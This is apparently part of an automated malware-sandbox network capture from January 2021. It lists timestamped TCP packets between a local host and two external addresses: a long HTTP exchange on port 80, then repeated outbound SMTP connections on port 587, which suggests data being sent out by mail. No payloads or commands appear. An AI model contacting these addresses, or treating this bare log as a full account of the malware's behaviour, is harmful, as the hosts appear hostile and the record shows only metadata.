Jan 27, 2021 19:29:38.182212114 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.182230949 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.182256937 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.182270050 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.182307005 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.182310104 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.182327032 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.182344913 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.182365894 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.182383060 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.182429075 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.182430029 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.182446003 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.182471991 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.182490110 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.182511091 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.182547092 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.182549000 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.182564020 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.182609081 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.182624102 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.182646036 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.182663918 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.182684898 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.182723045 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.182754040 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.182760000 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.182760954 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.182786942 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.182797909 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.182833910 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.182851076 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.182878017 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.182883024 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.182904959 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.182923079 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.182934046 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.182957888 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.182971001 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.182996035 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.183034897 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.183069944 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.183090925 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.183106899 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.183115005 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.183120012 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.183123112 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.183142900 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.183161974 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.183188915 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.183192968 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.183228970 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.183242083 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.183267117 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.183279991 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.183304071 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.183315992 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.183340073 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.183357954 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.183376074 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.183391094 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.183412075 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.183423996 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.183448076 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.183461905 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.183490038 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.183492899 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.183533907 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.183547020 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.183568954 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.183588028 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.183607101 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.183613062 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.183643103 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.183657885 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.183679104 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.183693886 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.183716059 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.183727980 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.183753014 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.183768034 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.183799028 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.183799982 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.183841944 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.183855057 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.183876991 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.183891058 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.183913946 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.183926105 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.183950901 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.183964014 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.183989048 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.184001923 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.184020996 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.184039116 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.184057951 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.184071064 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.184093952 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.184114933 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.184134960 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.184146881 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.184170961 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.184185028 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.184207916 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.184221029 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.184245110 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.184257030 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.184281111 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.184294939 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.184317112 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.184329033 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.184353113 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.184386015 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.184397936 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.184438944 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.184475899 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.184648991 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.184659004 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.184664011 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.184695959 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.232733965 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.232789993 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.232826948 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.232865095 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.232894897 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.232903004 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.232918978 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.232923031 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.232924938 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.232938051 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.232976913 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.232991934 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.232996941 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.233014107 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.233021975 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.233062983 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.233077049 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.233104944 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.233108044 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.233140945 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.233148098 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.233180046 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.233182907 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.233217001 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.233222008 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.233253002 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.233258009 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.233289957 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.233294010 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.233325005 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.233330965 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.233365059 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.233371019 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.233422041 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.233443975 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.233481884 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.233495951 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.233517885 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.233525038 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.233556032 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.233573914 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.233588934 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.233592033 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.233628035 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.233637094 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.233665943 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.233670950 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.233702898 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.233706951 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.233747959 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.233762026 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.233788967 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.233794928 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.233824968 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.233839035 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.233863115 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.233867884 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.233899117 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.233910084 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.233933926 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.233939886 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.233971119 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.233973980 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.234006882 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.234013081 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.234055042 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.234056950 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.234152079 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.283963919 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.284017086 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.284071922 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.284115076 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.284151077 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.284188032 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.284224987 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.284260988 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.284193039 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.284298897 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.284317970 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.284323931 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.284327984 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.284332991 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.284336090 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.284337044 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.284341097 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.284346104 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.284348965 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.284383059 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.284415007 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.284424067 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.284440041 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.284460068 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.284483910 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.284497976 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.284512043 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.284533978 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.284557104 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.284569979 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.284590960 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.284606934 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.284625053 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.284645081 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.284660101 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.284691095 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.284699917 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.284733057 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.284751892 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.284770966 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.284775972 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.284806967 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.284826994 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.284843922 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.284863949 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.284878969 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.284893036 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.284915924 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.284924030 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.284951925 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.284974098 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.284997940 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.285005093 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.285059929 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.285068989 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.285111904 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.285130978 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.285147905 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.285161018 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.285185099 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.285211086 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.285222054 CET	80	49168	193.239.147.103	192.168.2.22
Jan 27, 2021 19:29:38.285235882 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:38.285332918 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:29:46.793803930 CET	49168	80	192.168.2.22	193.239.147.103
Jan 27, 2021 19:30:18.448332071 CET	49169	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:18.643503904 CET	587	49169	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:18.643798113 CET	49169	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:18.838618040 CET	587	49169	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:18.839448929 CET	49169	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:19.032617092 CET	587	49169	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:19.032927036 CET	587	49169	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:19.033739090 CET	49169	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:19.228844881 CET	587	49169	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:19.265122890 CET	49169	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:19.460417986 CET	587	49169	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:19.462025881 CET	587	49169	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:19.462085009 CET	587	49169	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:19.462133884 CET	587	49169	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:19.462155104 CET	49169	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:19.462184906 CET	587	49169	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:19.462236881 CET	49169	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:19.469228983 CET	49169	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:19.563705921 CET	49169	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:19.662513018 CET	587	49169	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:19.663217068 CET	587	49169	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:19.663233995 CET	587	49169	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:19.663377047 CET	49169	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:19.663419008 CET	49169	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:19.759025097 CET	587	49169	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:19.759263039 CET	49169	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:19.759480953 CET	587	49169	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:19.759562016 CET	49169	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:25.011342049 CET	49170	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:25.205009937 CET	587	49170	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:25.205164909 CET	49170	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:25.400098085 CET	587	49170	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:25.400990009 CET	49170	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:25.594182014 CET	587	49170	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:25.594579935 CET	587	49170	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:25.595061064 CET	49170	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:25.788259029 CET	587	49170	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:25.789227962 CET	49170	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:25.984390020 CET	587	49170	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:25.985662937 CET	587	49170	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:25.985707045 CET	587	49170	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:25.985734940 CET	587	49170	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:25.985765934 CET	587	49170	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:25.986300945 CET	49170	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:26.000273943 CET	49170	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:26.193562984 CET	587	49170	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:26.194339991 CET	587	49170	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:26.194367886 CET	587	49170	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:26.194509983 CET	49170	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:27.473891020 CET	49170	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:27.667048931 CET	587	49170	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:27.667687893 CET	587	49170	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:27.667788982 CET	49170	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:32.997219086 CET	49172	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:33.192289114 CET	587	49172	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:33.192394018 CET	49172	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:33.386825085 CET	587	49172	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:33.387015104 CET	49172	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:33.582432985 CET	587	49172	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:33.582669973 CET	587	49172	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:33.583038092 CET	49172	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:33.778525114 CET	587	49172	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:33.779388905 CET	49172	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:33.973903894 CET	587	49172	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:33.973926067 CET	587	49172	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:33.973933935 CET	587	49172	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:33.974066019 CET	49172	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:33.975435019 CET	49172	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:34.053476095 CET	49172	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:34.169564009 CET	587	49172	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:34.169589043 CET	587	49172	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:34.248505116 CET	587	49172	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:34.249537945 CET	587	49172	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:34.251100063 CET	49172	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:34.444785118 CET	587	49172	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:34.446439028 CET	587	49172	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:34.447680950 CET	49172	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:34.641010046 CET	587	49172	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:34.645885944 CET	587	49172	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:34.646783113 CET	49172	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:34.839551926 CET	587	49172	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:34.842907906 CET	587	49172	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:34.843733072 CET	49172	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:35.039020061 CET	587	49172	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:35.066257954 CET	587	49172	198.54.122.60	192.168.2.22
Jan 27, 2021 19:30:35.066788912 CET	49172	587	192.168.2.22	198.54.122.60
Jan 27, 2021 19:30:35.259517908 CET	587	49172	198.54.122.60	192.168.2.22
